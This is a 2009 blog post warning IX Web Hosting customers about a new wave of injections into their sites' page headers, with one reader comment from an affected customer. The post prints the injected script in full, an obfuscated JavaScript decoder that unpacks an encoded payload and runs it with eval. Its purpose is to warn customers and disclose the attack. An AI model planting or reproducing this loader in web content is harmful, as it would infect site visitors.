A NEW wave of iFrame Injections for IX Web Hosts Customers

Posted: January 5, 2009 in IX Web Hosting
Tags: , , , , , , , , , , , , , , ,

It has come to my attention that a NEW wave of iFrame injections has infected 1000’s of new IX Web Host Customers, unlike the previous injection, that injected javascript into the footer of every file, this new piece of code is being injected into the “Header” of every file..

The new code looks like this:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,
15,60,5,50, 47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL
58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KD gOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM
@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>


Manager Kenny at IX Web Hosting  informed a customer today ( Mon 5th Jan.) that  they were testing right now and should be completed in a week or two…

ONE OR TWO WEEKS!!!.. Hey we have been waiting for 8 MONTHS!!!!  You would think that by the advice is giving all their paying customers, and blaming them for everything,  and then offering to fix the problem for $80 AN HOUR!!.. that they would know how to fix this problem, but is is clear they do not, and instead of putting more time and effort into solving this, what does IX do??… TRY AND MAKE MONEY FROM THE PROBLEM!!!… Thats correct, IX Web Hosting is offering to fix / clean customer sites for $80 an hour!!…  This is an absolute disgrace!!

To me it is clear that a large group of people know the vulnerability at IX servers, and various people are now injecting their own script, thats why we are starting to see various different scripts appearing.

  1. crystal says:

    Hi, I’m through ixwebhosting and this is the third time my websites have been hacked with the code in the last 3 months. It was just hacked this week and I believe it was in the Jan.2nd hack. All my clients were hacked, all 7 of them.
    I’m switching servers today. Is this just from their server, or is it actually coming from something in my website?
    I’m not real sure how it is happening and I’m not sure how to prevent it, or clean it up. I am using Iframe in my websites to load webpages. Is that safe?? I’m so confused.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s